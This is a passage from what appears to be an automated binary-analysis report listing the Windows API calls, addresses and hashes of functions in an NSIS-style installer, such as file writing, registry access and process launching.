                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                      Strings
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00403192
                                                        • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                      • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                      • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                      Similarity
                                                      • API ID: File$Pointer$CountTickWrite
                                                      • String ID:
                                                      • API String ID: 2146148272-0
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                      • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                      • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                      Similarity
                                                      • API ID: CloseCreateValuelstrlen
                                                      • String ID:
                                                      • API String ID: 1356686001-0
                                                      APIs
                                                        • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,00436800,?,771B2EE0,004057F0,?,00436800,771B2EE0,00434000), ref: 00405A4C
                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                      • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                      • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                      • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                      Similarity
                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3751793516-0
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                      • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                      • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                      Similarity
                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                      • String ID:
                                                      • API String ID: 1404258612-0
                                                      APIs
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                        • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                        • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                      Similarity
                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 3585118688-0
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00405195
                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                        • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                      Strings
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00405C01
                                                      • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C1C
                                                      Strings
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: nsa
                                                      • API String ID: 1716503409-2209301699
                                                      • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                      • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                      • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                      • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                      APIs
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                      • CloseHandle.KERNEL32(?), ref: 004056F5
                                                      Strings
                                                      • Error launching installer, xrefs: 004056D6
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: Error launching installer
                                                      • API String ID: 3712363035-66219284
                                                      • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                      • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                      • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                      • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                      • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                      • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                      • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                      • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                      • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                      • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9